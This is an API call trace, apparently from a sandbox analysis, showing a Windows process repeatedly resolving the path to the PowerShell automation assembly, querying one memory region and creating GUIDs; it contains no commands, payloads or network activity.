	[0337.250] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.250] VirtualQuery (in: lpAddress=0x26ba90, lpBuffer=0x26c950, dwLength=0x30 | out: lpBuffer=0x26c950*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.250] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.250] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.250] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.251] VirtualQuery (in: lpAddress=0x26b180, lpBuffer=0x26c040, dwLength=0x30 | out: lpBuffer=0x26c040*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.251] VirtualQuery (in: lpAddress=0x26b210, lpBuffer=0x26c0d0, dwLength=0x30 | out: lpBuffer=0x26c0d0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.251] VirtualQuery (in: lpAddress=0x26b8f0, lpBuffer=0x26c7b0, dwLength=0x30 | out: lpBuffer=0x26c7b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.251] VirtualQuery (in: lpAddress=0x26b980, lpBuffer=0x26c840, dwLength=0x30 | out: lpBuffer=0x26c840*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.251] VirtualQuery (in: lpAddress=0x26b8f0, lpBuffer=0x26c7b0, dwLength=0x30 | out: lpBuffer=0x26c7b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.251] VirtualQuery (in: lpAddress=0x26b980, lpBuffer=0x26c840, dwLength=0x30 | out: lpBuffer=0x26c840*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.251] VirtualQuery (in: lpAddress=0x26b980, lpBuffer=0x26c840, dwLength=0x30 | out: lpBuffer=0x26c840*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.251] VirtualQuery (in: lpAddress=0x26b8f0, lpBuffer=0x26c7b0, dwLength=0x30 | out: lpBuffer=0x26c7b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.252] VirtualQuery (in: lpAddress=0x26b980, lpBuffer=0x26c840, dwLength=0x30 | out: lpBuffer=0x26c840*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.252] VirtualQuery (in: lpAddress=0x26b8f0, lpBuffer=0x26c7b0, dwLength=0x30 | out: lpBuffer=0x26c7b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.262] VirtualQuery (in: lpAddress=0x26b980, lpBuffer=0x26c840, dwLength=0x30 | out: lpBuffer=0x26c840*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0337.262] VirtualQuery (in: lpAddress=0x26b8f0, lpBuffer=0x26c7b0, dwLength=0x30 | out: lpBuffer=0x26c7b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0337.262] VirtualQuery (in: lpAddress=0x26b980, lpBuffer=0x26c840, dwLength=0x30 | out: lpBuffer=0x26c840*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0337.262] VirtualQuery (in: lpAddress=0x26b5c0, lpBuffer=0x26c480, dwLength=0x30 | out: lpBuffer=0x26c480*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0337.262] VirtualQuery (in: lpAddress=0x26b8f0, lpBuffer=0x26c7b0, dwLength=0x30 | out: lpBuffer=0x26c7b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0337.262] VirtualQuery (in: lpAddress=0x26b980, lpBuffer=0x26c840, dwLength=0x30 | out: lpBuffer=0x26c840*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0337.262] VirtualQuery (in: lpAddress=0x26b8f0, lpBuffer=0x26c7b0, dwLength=0x30 | out: lpBuffer=0x26c7b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0337.262] VirtualQuery (in: lpAddress=0x26b980, lpBuffer=0x26c840, dwLength=0x30 | out: lpBuffer=0x26c840*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0337.263] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0xc979602f, Data2=0xc61, Data3=0x47d2, Data4=([0]=0x80, [1]=0x50, [2]=0xb5, [3]=0xc1, [4]=0xed, [5]=0x9e, [6]=0x59, [7]=0x25))) returned 0x0
	[0337.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.264] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.264] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.264] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.264] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.264] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.264] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.264] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.264] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.266] VirtualQuery (in: lpAddress=0x26b180, lpBuffer=0x26c040, dwLength=0x30 | out: lpBuffer=0x26c040*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0337.266] VirtualQuery (in: lpAddress=0x26b210, lpBuffer=0x26c0d0, dwLength=0x30 | out: lpBuffer=0x26c0d0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0337.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.267] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.267] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.267] VirtualQuery (in: lpAddress=0x26b430, lpBuffer=0x26c2f0, dwLength=0x30 | out: lpBuffer=0x26c2f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0337.267] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.267] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.267] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.267] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0xc6f6234b, Data2=0x61fc, Data3=0x4152, Data4=([0]=0x83, [1]=0x3b, [2]=0x58, [3]=0x96, [4]=0x8d, [5]=0x10, [6]=0x74, [7]=0xd1))) returned 0x0
	[0337.268] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.268] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.268] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.268] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.268] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.268] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.268] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.268] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.268] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.269] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x2842c234, Data2=0x8720, Data3=0x4170, Data4=([0]=0x82, [1]=0x9d, [2]=0x90, [3]=0x3a, [4]=0x5e, [5]=0x53, [6]=0x85, [7]=0x3d))) returned 0x0
	[0337.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
